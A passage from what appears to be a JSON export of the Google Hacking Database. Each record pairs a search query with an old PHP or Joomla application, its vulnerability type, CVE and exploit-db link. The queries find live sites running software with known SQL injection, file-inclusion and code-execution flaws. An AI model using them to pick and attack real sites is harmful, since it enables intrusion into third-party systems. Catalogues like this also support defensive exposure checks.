"http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+mcGalleryPRO%22", "shortDescription": "\"powered by mcGalleryPRO\"", "textualDescription": "mcGalleryPRO 2006 (path_to_folder) Remote Include Vulnerability - CVE: 2006-4720: http://www.exploit-db.com/exploits/2342" }, { "signatureReferenceNumber": "3071", "link": "https://www.exploit-db.com/ghdb/3071/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Dayfox+Designs+This+is+a+port+of+WordPress", "shortDescription": "Powered by Dayfox Designs This is a port of WordPress", "textualDescription": "Dayfox Blog 4 Multiple Local File Inclusion Vulnerabilities - CVE: 2008-3564: http://www.exploit-db.com/exploits/6203" }, { "signatureReferenceNumber": "3072", "link": "https://www.exploit-db.com/ghdb/3072/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+By+EgyPlus%22", "shortDescription": "\"Powered By EgyPlus\"", "textualDescription": "EgyPlus 7ml 1.0.1 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-2167: http://www.exploit-db.com/exploits/8865" }, { "signatureReferenceNumber": "3073", "link": "https://www.exploit-db.com/ghdb/3073/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_seminar", "shortDescription": "inurl:com_seminar", "textualDescription": "Joomla Component Seminar 1.28 (id) Blind SQL Injection - CVE: 2009-4200: http://www.exploit-db.com/exploits/8867" }, { "signatureReferenceNumber": "3074", "link": "https://www.exploit-db.com/ghdb/3074/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allintext:%22Powered+By+Buddy+Zone%22", "shortDescription": "allintext:\"Powered By Buddy Zone\"", "textualDescription": "Buddy Zone 1.5 Multiple SQL Injection Vulnerabilities - CVE: 2007-3526: http://www.exploit-db.com/exploits/4128" }, { "signatureReferenceNumber": "3075", "link": "https://www.exploit-db.com/ghdb/3075/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Foption%3Dcom_ice", "shortDescription": "inurl:index.php?option=com_ice", "textualDescription": "Joomla Component com_ice Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11544" }, { "signatureReferenceNumber": "3076", "link": "https://www.exploit-db.com/ghdb/3076/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+LiteCommerce", "shortDescription": "Powered by LiteCommerce", "textualDescription": "litecommerce 2004 (category_id) Remote SQL Injection Vulnerability - CVE: 2005-1032: http://www.exploit-db.com/exploits/4300" }, { "signatureReferenceNumber": "3077", "link": "https://www.exploit-db.com/ghdb/3077/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Web+Group+Communication+Center%22", "shortDescription": "\"Web Group Communication Center\"", "textualDescription": "Web Group Communication Center (WGCC) 1.0.3 SQL Injection Vuln - CVE: 2008-2445: http://www.exploit-db.com/exploits/5606" }, { "signatureReferenceNumber": "3078", "link": "https://www.exploit-db.com/ghdb/3078/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_xewebtv", "shortDescription": "inurl:com_xewebtv", "textualDescription": "Joomla Component Xe webtv (id) Blind SQL Injection - CVE: 2008-5200: http://www.exploit-db.com/exploits/5966" }, { "signatureReferenceNumber": "3080", "link": "https://www.exploit-db.com/ghdb/3080/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Foption%3Dcom_paxgallery", "shortDescription": "inurl:index.php?option=com_paxgallery", "textualDescription": "Joomla Component com_paxgallery Blind Injection Vulnerability: http://www.exploit-db.com/exploits/11595" }, { "signatureReferenceNumber": "3082", "link": "https://www.exploit-db.com/ghdb/3082/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Site+designed+and+built+by+ProWeb+Associates.%22", "shortDescription": "\"Site designed and built by ProWeb Associates.\"", "textualDescription": "ProWeb Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12730" }, { "signatureReferenceNumber": "3083", "link": "https://www.exploit-db.com/ghdb/3083/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+iScripts+SocialWare", "shortDescription": "Powered by iScripts SocialWare", "textualDescription": "Upload Vulnerability and XSS in socialware V2.2: http://www.exploit-db.com/exploits/12448" }, { "signatureReferenceNumber": "3084", "link": "https://www.exploit-db.com/ghdb/3084/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22(C)+This+site+is+NITROpowered!%22", "shortDescription": "\"(C) This site is NITROpowered!\"", "textualDescription": "NITRO Web Gallery SQL Injection Vulnerability - CVE: 2010-2141: http://www.exploit-db.com/exploits/12735" }, { "signatureReferenceNumber": "3085", "link": "https://www.exploit-db.com/ghdb/3085/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22phpQuestionnaire+v3%22", "shortDescription": "\"phpQuestionnaire v3\"", "textualDescription": "phpQuestionnaire 3.12 (phpQRootDir) Remote File Include Vulnerability - CVE: 2006-4966: http://www.exploit-db.com/exploits/2410" }, { "signatureReferenceNumber": "3086", "link": "https://www.exploit-db.com/ghdb/3086/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22generated+by+Exhibit+Engine+1.5+RC+4%22", "shortDescription": "\"generated by Exhibit Engine 1.5 RC 4\"", "textualDescription": "Exhibit Engine 1.5 RC 4 (photo_comment.php) File Include - CVE: 2006-5292: http://www.exploit-db.com/exploits/2509" }, { "signatureReferenceNumber": "3087", "link": "https://www.exploit-db.com/ghdb/3087/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=powered+by+connectix+boards", "shortDescription": "powered by connectix boards", "textualDescription": "Connectix Boards 0.8.2 template_path Remote File Inclusion - CVE: 2008-0502: http://www.exploit-db.com/exploits/5012" }, { "signatureReferenceNumber": "3088", "link": "https://www.exploit-db.com/ghdb/3088/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_ezstore", "shortDescription": "inurl:com_ezstore", "textualDescription": "Joomla Component EZ Store Remote Blind SQL Injection - CVE: 2008-3586: http://www.exploit-db.com/exploits/6199" }, { "signatureReferenceNumber": "3089", "link": "https://www.exploit-db.com/ghdb/3089/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22FrontAccounting%22", "shortDescription": "\"FrontAccounting\"", "textualDescription": "FrontAccounting 1.13 Remote File Inclusion Vulnerabilities - CVE: 2007-5117: http://www.exploit-db.com/exploits/4456" }, { "signatureReferenceNumber": "3090", "link": "https://www.exploit-db.com/ghdb/3090/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22option%3Dcom_elite_experts%22", "shortDescription": "inurl:\"option=com_elite_experts\"", "textualDescription": "Joomla Component (com_elite_experts) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15100" }, { "signatureReferenceNumber": "3091", "link": "https://www.exploit-db.com/ghdb/3091/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_tupinambis%22", "shortDescription": "inurl:\"com_tupinambis\"", "textualDescription": "Joomla/Mambo Tupinambis SQL Injection - CVE: 2009-3434: http://www.exploit-db.com/exploits/9832" }, { "signatureReferenceNumber": "3092", "link": "https://www.exploit-db.com/ghdb/3092/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+By+Basic+CMS+SweetRice%22", "shortDescription": "\"Powered By Basic CMS SweetRice\"", "textualDescription": "SweetRice 0.6.4 (fckeditor) Remote File Upload: http://www.exploit-db.com/exploits/14184" }, { "signatureReferenceNumber": "3093", "link": "https://www.exploit-db.com/ghdb/3093/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+AMCMS3%22", "shortDescription": "\"Powered by AMCMS3\"", "textualDescription": "Arcadem 2.01 Remote SQL Injection / RFI Vulnerabilties: http://www.exploit-db.com/exploits/4326" }, { "signatureReferenceNumber": "3094", "link": "https://www.exploit-db.com/ghdb/3094/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Web+Site+Design+by+Red+Cat+Studios%22", "shortDescription": "\"Web Site Design by Red Cat Studios\"", "textualDescription": "Realtor WebSite System E-Commerce SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12772" }, { "signatureReferenceNumber": "3095", "link": "https://www.exploit-db.com/ghdb/3095/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Foption%3Dcom_liveticker+%22viewticker%22", "shortDescription": "inurl:index.php?option=com_liveticker \"viewticker\"", "textualDescription": "Joomla Component com_liveticker Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11604" }, { "signatureReferenceNumber": "3101", "link": "https://www.exploit-db.com/ghdb/3101/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:%22com_cinema%22", "shortDescription": "allinurl:\"com_cinema\"", "textualDescription": "Joomla Component Cinema 1.0 Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5300" }, { "signatureReferenceNumber": "3103", "link": "https://www.exploit-db.com/ghdb/3103/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Tanyakan+Pada+Rumput+Yang+Bergoyang%22", "shortDescription": "\"Tanyakan Pada Rumput Yang Bergoyang\"", "textualDescription": "Autonomous LAN party 0.98.3 Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/9460" }, { "signatureReferenceNumber": "3104", "link": "https://www.exploit-db.com/ghdb/3104/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Clipshare%22", "shortDescription": "\"Powered by Clipshare\"", "textualDescription": "ClipShare 2.6 Remote User Password Change - CVE: 2008-7188: http://www.exploit-db.com/exploits/4837" }, { "signatureReferenceNumber": "3106", "link": "https://www.exploit-db.com/ghdb/3106/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+PHPizabi+v0.848b+C1+HFP1%22", "shortDescription": "\"Powered by PHPizabi v0.848b C1 HFP1\"", "textualDescription": "PHPizabi 0.848b C1 HFP1 Remote File Upload Vulnerability - CVE: 2008-0805: http://www.exploit-db.com/exploits/5136" }, { "signatureReferenceNumber": "3108", "link": "https://www.exploit-db.com/ghdb/3108/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_jejob", "shortDescription": "inurl:com_jejob", "textualDescription": "Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12782" }, { "signatureReferenceNumber": "3109", "link": "https://www.exploit-db.com/ghdb/3109/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Devana+is+an+open+source+project+!%22", "shortDescription": "\"Devana is an open source project !\"", "textualDescription": "Devana SQL Injection vulnerability - CVE: 2010-2673: http://www.exploit-db.com/exploits/11922" }, { "signatureReferenceNumber": "3110", "link": "https://www.exploit-db.com/ghdb/3110/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_jpodium%22", "shortDescription": "inurl:\"com_jpodium\"", "textualDescription": "Joomla JPodium Component (com_jpodium) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14232" }, { "signatureReferenceNumber": "3111", "link": "https://www.exploit-db.com/ghdb/3111/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22Powered+by:+Virtual+War+v1.5.0%22", "shortDescription": "intext:\"Powered by: Virtual War v1.5.0\"", "textualDescription": "VWar 1.50 R14 (online.php) Remote SQL Injection Vulnerability - CVE: 2006-4142: http://www.exploit-db.com/exploits/2170" }, { "signatureReferenceNumber": "3112", "link": "https://www.exploit-db.com/ghdb/3112/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php/option%3Fcom_flexicontent", "shortDescription": "inurl:index.php/option?com_flexicontent", "textualDescription": "Joomla Component com_flexicontent Local File Vulnerability: http://www.exploit-db.com/exploits/12185" }, { "signatureReferenceNumber": "3113", "link": "https://www.exploit-db.com/ghdb/3113/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:option%3Dcom_agenda", "shortDescription": "inurl:option=com_agenda", "textualDescription": "Joomla Component com_agenda 1.0.1 (id) SQL Injection Vulnerability - CVE: 2010-1716: http://www.exploit-db.com/exploits/12132" }, { "signatureReferenceNumber": "3118", "link": "https://www.exploit-db.com/ghdb/3118/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22index.php%3Fcss%3Dmid%3Dart%3D%22", "shortDescription": "inurl:\"index.php?css=mid=art=\"", "textualDescription": "EasyWay CMS (index.php mid) Remote SQL Injection - CVE: 2008-2555: http://www.exploit-db.com/exploits/5706" }, { "signatureReferenceNumber": "3120", "link": "https://www.exploit-db.com/ghdb/3120/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+By+Webcards%22", "shortDescription": "\"Powered By Webcards\"", "textualDescription": "WebCards 1.3 Remote SQL Injection Vulnerability - CVE: 2008-4878: http://www.exploit-db.com/exploits/6869" }, { "signatureReferenceNumber": "3123", "link": "https://www.exploit-db.com/ghdb/3123/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22sitio+web+dise%C3%B1ado+por+www.toronja.com.pe%22", "shortDescription": "\"sitio web dise\u00f1ado por www.toronja.com.pe\"", "textualDescription": "toronja cms SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12770" }, { "signatureReferenceNumber": "3124", "link": "https://www.exploit-db.com/ghdb/3124/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=E-Commerce+Engine+Copyright+%C2%A9+2005+osCSS", "shortDescription": "E-Commerce Engine Copyright \u00a9 2005 osCSS", "textualDescription": "osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities: http://www.exploit-db.com/exploits/12856" }, { "signatureReferenceNumber": "3126", "link": "https://www.exploit-db.com/ghdb/3126/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Bug+Software+intext:Your+Cart+Contains", "shortDescription": "Powered by Bug Software intext:Your Cart Contains", "textualDescription": "BugMall Shopping Cart 2.5 (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2007-3448: http://www.exploit-db.com/exploits/4103" }, { "signatureReferenceNumber": "3127", "link": "https://www.exploit-db.com/ghdb/3127/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Winn+ASP+Guestbook+from+Winn.ws", "shortDescription": "Winn ASP Guestbook from Winn.ws", "textualDescription": "Winn ASP Guestbook 1.01b Remote Database Disclosure - CVE: 2009-4760: http://www.exploit-db.com/exploits/8596" }, { "signatureReferenceNumber": "3128", "link": "https://www.exploit-db.com/ghdb/3128/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:option%3Dcom_n-forms+form_id", "shortDescription": "inurl:option=com_n-forms form_id", "textualDescription": "Mambo Component n-form (form_id) Blind SQL Injection: http://www.exploit-db.com/exploits/7064" }, { "signatureReferenceNumber": "3129", "link": "https://www.exploit-db.com/ghdb/3129/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22English+for+dummies%22", "shortDescription": "intext:\"English for dummies\"", "textualDescription": "Mobilelib Gold v3 Local File Disclosure Vulnerability - CVE: 2009-3823: http://www.exploit-db.com/exploits/9144" }, { "signatureReferenceNumber": "3131", "link": "https://www.exploit-db.com/ghdb/3131/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_lyftenbloggie%22+/+%22Powered+by+LyftenBloggie%22", "shortDescription": "inurl:\"com_lyftenbloggie\" / \"Powered by LyftenBloggie\"", "textualDescription": "Joomla Component com_lyftenbloggie 1.04 Remote SQL Injection Vulnerability - CVE: 2009-4104: http://www.exploit-db.com/exploits/10238" }, { "signatureReferenceNumber": "3133", "link": "https://www.exploit-db.com/ghdb/3133/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+GGCMS%22", "shortDescription": "\"Powered by GGCMS\"", "textualDescription": "GGCMS 1.1.0 RC1 Remote Code Execution - CVE: 2007-0804: http://www.exploit-db.com/exploits/3271" }, { "signatureReferenceNumber": "3134", "link": "https://www.exploit-db.com/ghdb/3134/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Ac4p.com+Gallery+v1.0+,+Copyright%C2%A9+2007+ac4p.com", "shortDescription": "Powered by Ac4p.com Gallery v1.0 , Copyright\u00a9 2007 ac4p.com", "textualDescription": "Ac4p.com Gallery v1.0 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/11519" }, { "signatureReferenceNumber": "3135", "link": "https://www.exploit-db.com/ghdb/3135/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Fmenu%3Dshowcat", "shortDescription": "inurl:index.php?menu=showcat", "textualDescription": "ACG-ScriptShop (cid) Remote SQL Injection Vulnerability - CVE: 2008-4144: http://www.exploit-db.com/exploits/6364" }, { "signatureReferenceNumber": "3136", "link": "https://www.exploit-db.com/ghdb/3136/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+minb", "shortDescription": "Powered by minb", "textualDescription": "minb 0.1.0 Remote Code Execution - CVE: 2008-7005: http://www.exploit-db.com/exploits/6432" }, { "signatureReferenceNumber": "3137", "link": "https://www.exploit-db.com/ghdb/3137/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+phpCC+Beta+4.2%22", "shortDescription": "\"Powered by phpCC Beta 4.2\"", "textualDescription": "phpCC 4.2 beta (base_dir) Remote File Inclusion Vulnerability - CVE: 2006-4073: http://www.exploit-db.com/exploits/2134" }, { "signatureReferenceNumber": "3138", "link": "https://www.exploit-db.com/ghdb/3138/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Fmenu%3Dshowcat%3D", "shortDescription": "inurl:index.php?menu=showcat=", "textualDescription": "Alstrasoft Forum (cat) Remote SQL Injection Vulnerability - CVE: 2008-3954: http://www.exploit-db.com/exploits/6396" }, { "signatureReferenceNumber": "3143", "link": "https://www.exploit-db.com/ghdb/3143/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:elkagroup++Image+Gallery+v1.0", "shortDescription": "intext:elkagroup Image Gallery v1.0", "textualDescription": "elkagroup Image Gallery 1.0 Remote SQL Injection Vulnerability - CVE: 2007-3461: http://www.exploit-db.com/exploits/4114" }, { "signatureReferenceNumber": "3144", "link": "https://www.exploit-db.com/ghdb/3144/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Digital+College+1.0+-+Magtrb+Soft+2010", "shortDescription": "Powered by Digital College 1.0 - Magtrb Soft 2010", "textualDescription": "Digital College 1.0 Upload Vulnerability: http://www.exploit-db.com/exploits/12568" }, { "signatureReferenceNumber": "3145", "link": "https://www.exploit-db.com/ghdb/3145/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+AMCMS3%22", "shortDescription": "\"powered by AMCMS3\"", "textualDescription": "Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection - CVE: 2008-0262: http://www.exploit-db.com/exploits/4905" }, { "signatureReferenceNumber": "3146", "link": "https://www.exploit-db.com/ghdb/3146/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22e107_plugins/my_gallery%22", "shortDescription": "inurl:\"e107_plugins/my_gallery\"", "textualDescription": "e107 Plugin My_Gallery 2.3 Arbitrary File Download Vulnerability - CVE: 2008-1702: http://www.exploit-db.com/exploits/5308" }, { "signatureReferenceNumber": "3147", "link": "https://www.exploit-db.com/ghdb/3147/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+BIGACE+2.4%22", "shortDescription": "\"Powered by BIGACE 2.4\"", "textualDescription": "BIGACE 2.4 Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-2520: http://www.exploit-db.com/exploits/5596" }, { "signatureReferenceNumber": "3148", "link": "https://www.exploit-db.com/ghdb/3148/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22/wp-content/plugins/wp-shopping-cart/%22", "shortDescription": "inurl:\"/wp-content/plugins/wp-shopping-cart/\"", "textualDescription": "Wordpress Plugin e-Commerce" }, { "signatureReferenceNumber": "3150", "link": "https://www.exploit-db.com/ghdb/3150/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intitle:%22igenus+webmail+login%22", "shortDescription": "intitle:\"igenus webmail login\"", "textualDescription": "iGENUS WebMail 2.0.2 (config_inc.php) Remote Code Execution - CVE: 2006-1031: http://www.exploit-db.com/exploits/1527" }, { "signatureReferenceNumber": "3151", "link": "https://www.exploit-db.com/ghdb/3151/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by++www.aspportal.net%22", "shortDescription": "\"Powered by www.aspportal.net\"", "textualDescription": "ASPPortal Free Version (Topic_Id) Remote SQL Injection Vulnerability - CVE: 2008-5268: http://www.exploit-db.com/exploits/5775" }, { "signatureReferenceNumber": "3152", "link": "https://www.exploit-db.com/ghdb/3152/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_ijoomla_archive%22", "shortDescription": "inurl:\"com_ijoomla_archive\"", "textualDescription": "Joomla com_ijoomla_archive Blind SQL Injectio: http://www.exploit-db.com/exploits/8164" }, { "signatureReferenceNumber": "3154", "link": "https://www.exploit-db.com/ghdb/3154/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Power+by+Blakord+Portal%22", "shortDescription": "\"Power by Blakord Portal\"", "textualDescription": "Blakord Portal Beta 1.3.A (all modules) SQL Injection Vulnerability - CVE: 2007-6565: http://www.exploit-db.com/exploits/4793" }, { "signatureReferenceNumber": "3155", "link": "https://www.exploit-db.com/ghdb/3155/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+FreeWebshop%22", "shortDescription": "\"Powered by FreeWebshop\"", "textualDescription": "FreeWebshop" }, { "signatureReferenceNumber": "3156", "link": "https://www.exploit-db.com/ghdb/3156/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22Designed+by+Spaceacre%22", "shortDescription": "intext:\"Designed by Spaceacre\"", "textualDescription": "Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities: http://www.exploit-db.com/exploits/12746" }, { "signatureReferenceNumber": "3157", "link": "https://www.exploit-db.com/ghdb/3157/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:option%3Dcom_mv_restaurantmenumanager", "shortDescription": "inurl:option=com_mv_restaurantmenumanager", "textualDescription": "Joomla component mv_restaurantmenumanager SQL injection Vulnerability: http://www.exploit-db.com/exploits/12162" }, { "signatureReferenceNumber": "3158", "link": "https://www.exploit-db.com/ghdb/3158/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_ajaxchat%22", "shortDescription": "inurl:\"com_ajaxchat\"", "textualDescription": "Joomla Ajax Chat 1.0 remote file inclusion - CVE: 2009-3822: http://www.exploit-db.com/exploits/9888" }, { "signatureReferenceNumber": "3160", "link": "https://www.exploit-db.com/ghdb/3160/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by:+AIH+v2.3", "shortDescription": "Powered by: AIH v2.3", "textualDescription": "Advanced Image Hosting (AIH) 2.3 (gal) Blind SQL Injection Vuln - CVE: 2009-1032: http://www.exploit-db.com/exploits/8238" }, { "signatureReferenceNumber": "3162", "link": "https://www.exploit-db.com/ghdb/3162/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/macgurublog_menu/", "shortDescription": "inurl:/macgurublog_menu/", "textualDescription": "e107 Plugin BLOG Engine 2.2 (rid) Blind SQL Injection Vulnerability - CVE: 2008-2455: http://www.exploit-db.com/exploits/5604" }, { "signatureReferenceNumber": "3164", "link": "https://www.exploit-db.com/ghdb/3164/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22%3Fpage%3Dduyurular_detay%26id%3D%22", "shortDescription": "inurl:\"?page=duyurular_detay&id=\"", "textualDescription": "Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities - CVE: 2007-4068: http://www.exploit-db.com/exploits/4224" }, { "signatureReferenceNumber": "3165", "link": "https://www.exploit-db.com/ghdb/3165/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22X-CART.+Powerful+PHP+shopping+cart+software%22", "shortDescription": "\"X-CART. Powerful PHP shopping cart software\"", "textualDescription": "X-Cart ? Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4907: http://www.exploit-db.com/exploits/4396" }, { "signatureReferenceNumber": "3166", "link": "https://www.exploit-db.com/ghdb/3166/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=This+site+is+powered+by+e107,+which+is+released+under+the+terms+of+the+GNU+GPL+License.", "shortDescription": "This site is powered by e107, which is released under the terms of the GNU GPL License.", "textualDescription": "e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities: http://www.exploit-db.com/exploits/12818" }, { "signatureReferenceNumber": "3167", "link": "https://www.exploit-db.com/ghdb/3167/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22S-CMS+by+matteoiamma%22", "shortDescription": "\"S-CMS by matteoiamma\"", "textualDescription": "S-CMS 2.0b3 Multiple Local File Inclusion Vulnerabilities: http://www.exploit-db.com/exploits/8913" }, { "signatureReferenceNumber": "3168", "link": "https://www.exploit-db.com/ghdb/3168/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:offers.php%3Fid%3D", "shortDescription": "allinurl:offers.php?id=", "textualDescription": "B2B Classic Trading Script (offers.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12532" }, { "signatureReferenceNumber": "3169", "link": "https://www.exploit-db.com/ghdb/3169/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+By+HASHE%22", "shortDescription": "\"Powered By HASHE\"", "textualDescription": "HASHE! Solutions Multiple SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/11383" }, { "signatureReferenceNumber": "3170", "link": "https://www.exploit-db.com/ghdb/3170/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:we_objectID%3D", "shortDescription": "inurl:we_objectID=", "textualDescription": "webEdition CMS (we_objectID) Blind SQL Injection - CVE: 2008-4154: http://www.exploit-db.com/exploits/6281" }, { "signatureReferenceNumber": "3172", "link": "https://www.exploit-db.com/ghdb/3172/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%222009+Jorp%22", "shortDescription": "\"2009 Jorp\"", "textualDescription": "Jorp 1.3.05.09 Remote Arbitrary Remove Projects/Tasks Vulnerabilities: http://www.exploit-db.com/exploits/8752" }, { "signatureReferenceNumber": "3174", "link": "https://www.exploit-db.com/ghdb/3174/", "category": "Advisories and Vulnerabilities", "querystring": 